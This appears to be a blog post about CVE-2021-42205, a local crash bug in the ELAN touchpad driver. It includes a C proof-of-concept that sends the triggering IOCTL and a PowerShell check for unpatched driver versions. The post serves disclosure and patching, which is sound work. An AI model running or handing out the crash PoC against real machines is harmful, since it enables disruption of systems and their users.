CVE-2021-42205 is a vulnerability identified in the ELAN Miniport touchpad Windows driver, which can lead to a system crash when a specific IOCTL request is sent by a local user. The vulnerability is present in ELAN Miniport touchpad Windows driver versions earlier than 24.21.51.2, and has been found to affect multiple manufacturers' PC hardware. In this post, we will delve into the details of the vulnerability, its exploitation, and the potential consequences that can arise from its abuse. We will also provide the original references and share code snippets to better understand the issue.

Vulnerability Details

The vulnerability in the ELAN Miniport touchpad Windows driver stems from the fact that a certain IOCTL request is handled twice. When a local user submits this problematic IOCTL request, the system attempts to process it twice, leading to a crash.

An IOCTL request, or Input/Output Control request, is a mechanism used by Microsoft Windows operating systems to send control codes and data to kernel-mode drivers. In this case, the IOCTL request targets the ELAN Miniport touchpad Windows driver, which handles it improperly and crashes the system.

It is important to note that the vulnerability requires local access to the target system to be exploited. A remote attacker would not be able to directly exploit this flaw without some form of local access or assistance, such as via social engineering, malware infection, or other means.

Exploit Details

The following code snippet demonstrates how a local user could send the IOCTL request that triggers the vulnerability:

#include <Windows.h>
#include <stdio.h>

// IOCTL control code sent to the ELAN driver (value as given in this post)
#define ELAN_IOCTL 0x800020D

int main(void) {
    // Open a handle to the driver's device object
    HANDLE hDevice = CreateFileW(L"\\\\.\\Etd",
                                 GENERIC_READ | GENERIC_WRITE,
                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
                                 NULL,
                                 OPEN_EXISTING,
                                 FILE_ATTRIBUTE_NORMAL,
                                 NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Unable to open device: %lu\n", GetLastError());
        return 1;
    }

    // Zero-initialized input and output buffers for the request
    BYTE inputBuffer[16] = {0};
    BYTE outputBuffer[16] = {0};
    DWORD bytesReturned = 0;

    // Send the IOCTL request to the driver
    BOOL result = DeviceIoControl(hDevice,
                                  ELAN_IOCTL,
                                  inputBuffer,
                                  sizeof(inputBuffer),
                                  outputBuffer,
                                  sizeof(outputBuffer),
                                  &bytesReturned,
                                  NULL);

    if (!result) {
        printf("[-] IOCTL failed: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] IOCTL succeeded\n");
    CloseHandle(hDevice);
    return 0;
}

This code example creates an IOCTL request targeting the vulnerable ELAN Miniport touchpad Windows driver and sends it to the device. If executed on a system with an affected version of the driver, it will cause a system crash.

The vulnerability was initially reported through the following sources:

1. CVE-2021-42205 entry in the Common Vulnerabilities and Exposures (CVE) database: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42205
2. Security Advisory from ELAN Microelectronics Corp: http://www.emc.com.tw/eng/doc/doc_Asset_security_advisory.pdf

Mitigation

To mitigate the vulnerability, PC manufacturers have started rolling out updated versions of the ELAN Miniport touchpad Windows driver. Users who are using affected versions should update their systems to driver version 24.21.51.2 or later to prevent exploitation.
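One way to check whether a machine still runs a driver older than 24.21.51.2, as an added example that is not part of the original post or ELAN's advisory. It assumes ELAN drivers identify themselves with "ELAN" in the provider or manufacturer field of Win32_PnPSignedDriver; the function name and the sample records are constructed for illustration.

```powershell
# Added example: flag ELAN touchpad drivers older than the fixed version.
$FixedVersion = [version]'24.21.51.2'   # fixed version from the Mitigation section

function Test-ElanDriverVersion {       # hypothetical helper name
    param(
        [Parameter(Mandatory)] [object[]] $Drivers,
        [version] $Fixed = $FixedVersion
    )
    foreach ($d in $Drivers) {
        # Assumption: ELAN drivers carry "ELAN" in the provider or manufacturer field.
        if ("$($d.DriverProviderName) $($d.Manufacturer)" -notmatch '\bELAN\b') { continue }

        # Compare as [version], not as strings: '24.21.9.4' sorts after
        # '24.21.51.2' as text but is the older build numerically.
        $parsed = $null
        $ok = [version]::TryParse([string]$d.DriverVersion, [ref]$parsed)
        $status = if (-not $ok) { 'UNKNOWN' } elseif ($parsed -lt $Fixed) { 'VULNERABLE' } else { 'OK' }

        [pscustomobject]@{
            DeviceName    = $d.DeviceName
            DriverVersion = $d.DriverVersion
            Status        = $status
        }
    }
}

# Constructed sample records (not real inventory data) covering each outcome.
$sample = @(
    [pscustomobject]@{ DeviceName = 'Sample touchpad A'; DriverProviderName = 'ELAN'; Manufacturer = 'ELAN'; DriverVersion = '24.21.9.4' }
    [pscustomobject]@{ DeviceName = 'Sample touchpad B'; DriverProviderName = 'ELAN'; Manufacturer = 'ELAN'; DriverVersion = '24.21.51.2' }
    [pscustomobject]@{ DeviceName = 'Sample touchpad C'; DriverProviderName = 'ELAN'; Manufacturer = 'ELAN'; DriverVersion = 'n/a' }
    [pscustomobject]@{ DeviceName = 'Sample NIC';        DriverProviderName = 'Other'; Manufacturer = 'Other'; DriverVersion = '1.0.0.0' }
)
Test-ElanDriverVersion -Drivers $sample | Format-Table -AutoSize
# Sample A -> VULNERABLE, B -> OK, C -> UNKNOWN, the NIC is skipped.

# Live check against the local machine's installed signed drivers.
if ($env:OS -eq 'Windows_NT') {
    $live = Get-CimInstance -ClassName Win32_PnPSignedDriver
    Test-ElanDriverVersion -Drivers $live | Format-Table -AutoSize
}
```

An empty result from the live check means no driver matching the ELAN filter was found on that machine.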

Conclusion

CVE-2021-42205 is a significant vulnerability, as it allows local users with knowledge of the exploit to cause a system crash. This can be particularly problematic in shared and multi-user environments where malicious users could disrupt the system for others. By updating the ELAN Miniport touchpad Windows driver to the latest version, users can protect their systems from this vulnerability and maintain system stability.

Timeline

Published on: 11/07/2022 16:15:00 UTC
Last modified on: 11/09/2022 20:19:00 UTC